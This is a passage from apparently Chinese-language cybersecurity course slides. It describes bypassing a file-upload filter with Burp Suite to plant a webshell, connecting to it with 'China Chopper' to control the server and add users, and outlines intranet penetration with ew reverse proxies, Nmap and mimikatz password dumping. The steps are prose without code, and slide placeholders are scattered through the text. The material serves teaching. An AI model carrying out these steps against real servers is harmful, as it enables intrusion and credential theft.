(5)啟動(dòng)Burpsuite軟件,將webshell.php文件名改為webshell.jpg,在網(wǎng)頁(yè)中選擇此文件,單擊上傳所示,此時(shí)Burpsuite軟件會(huì)攔截上傳信息此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——

上傳網(wǎng)站木馬WebShell延遲符

(6)修改上傳文件名,將webshell.jpg改為webshell.php,點(diǎn)擊按鈕使Burpsuite狀態(tài)變?yōu)椤癷nterceptisoff”,此時(shí)木馬成功上傳,訪問木馬網(wǎng)頁(yè)此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——利用“中國(guó)菜刀”連接木馬網(wǎng)頁(yè)延遲符

利用“中國(guó)菜刀”連接工具嘗試連接木馬網(wǎng)頁(yè),在“地址”中填寫上傳一句話木馬的URL,在后面的方框中填寫所要連接的參數(shù)。此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——利用“中國(guó)菜刀”連接木馬網(wǎng)頁(yè)延遲符

添加完成之后,可以對(duì)目標(biāo)服務(wù)器進(jìn)行控制,查看系統(tǒng)文件,添加系統(tǒng)用戶。此處添加標(biāo)題Addthistitle項(xiàng)目總結(jié)——

Windows應(yīng)用安全

本項(xiàng)目主要介紹了Windows木馬、后門以及Metasploit工具的使用。黨的二十大中強(qiáng)調(diào)了網(wǎng)絡(luò)安全意識(shí)的教育,通過本項(xiàng)目的教學(xué),學(xué)生們深刻理解了網(wǎng)絡(luò)攻擊的危害性,掌握了Windows應(yīng)用的滲透技術(shù),提高了網(wǎng)絡(luò)安全的防范意識(shí)。CONTENTS目錄z走進(jìn)Windows服務(wù)器01

Windows服務(wù)器用戶管理02Windows服務(wù)器共享管理03Windows服務(wù)器網(wǎng)站管理04延遲符z06070805Windows服務(wù)器遠(yuǎn)程管理Windows域管理Windows應(yīng)用安全Windows內(nèi)網(wǎng)安全08Windows內(nèi)網(wǎng)安全本項(xiàng)目是Windows內(nèi)網(wǎng)安全,項(xiàng)目通過兩個(gè)任務(wù)介紹了內(nèi)網(wǎng)安全的基礎(chǔ)知識(shí)和內(nèi)網(wǎng)滲透的相關(guān)步驟,通過實(shí)際案例講述了網(wǎng)絡(luò)攻擊的一般流程,本項(xiàng)目提升了學(xué)生對(duì)內(nèi)網(wǎng)安全的關(guān)注度,為今后從事網(wǎng)絡(luò)運(yùn)維相關(guān)工作做準(zhǔn)備。延遲符Windows內(nèi)網(wǎng)安全認(rèn)識(shí)內(nèi)網(wǎng)安全內(nèi)網(wǎng)滲透實(shí)戰(zhàn)延遲符本任務(wù)介紹了內(nèi)網(wǎng)中端口映射、內(nèi)網(wǎng)轉(zhuǎn)發(fā)、代理、socket協(xié)議等相關(guān)概念,講述了信息收集與密碼抓取的方法,為后面學(xué)習(xí)內(nèi)網(wǎng)滲透的實(shí)際案例做準(zhǔn)備。此處添加標(biāo)題Addthistitle認(rèn)識(shí)內(nèi)網(wǎng)安全任務(wù)分析Taskanalysis必備知識(shí)Essentialknowledge任務(wù)實(shí)施Taskimplementation操作步驟Operationsteps本任務(wù)介紹了內(nèi)網(wǎng)中端口映射、內(nèi)網(wǎng)轉(zhuǎn)發(fā)、代理、socket協(xié)議等相關(guān)概念,講述了信息收集與密碼抓取的方法,為后面學(xué)習(xí)內(nèi)網(wǎng)滲透的實(shí)際案例做準(zhǔn)備。內(nèi)網(wǎng)安全端口映射和內(nèi)網(wǎng)轉(zhuǎn)發(fā)網(wǎng)絡(luò)代理和Socket協(xié)議信息收集和密碼獲取基于ew反向代理

Nmap信息收集mimikatz工具抓取密碼延遲符此處添加標(biāo)題Addthistitle必備知識(shí)——內(nèi)網(wǎng)安全延遲符

內(nèi)網(wǎng)安全指的是網(wǎng)絡(luò)內(nèi)部計(jì)算機(jī)客戶端的安全。目前內(nèi)部網(wǎng)絡(luò)面臨的主要安全威脅包括資產(chǎn)管理失控、網(wǎng)絡(luò)資源濫用、病毒蠕蟲入侵、外部非法接入、內(nèi)部非法外聯(lián)、重要信息泄密、補(bǔ)丁管理混亂等。此處添加標(biāo)題Addthistitle必備知識(shí)——端口映射和內(nèi)網(wǎng)轉(zhuǎn)發(fā)延遲符

端口映射

溫馨提示

  • 1. 本站所有資源如無(wú)特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

最新文檔

評(píng)論

0/150

提交評(píng)論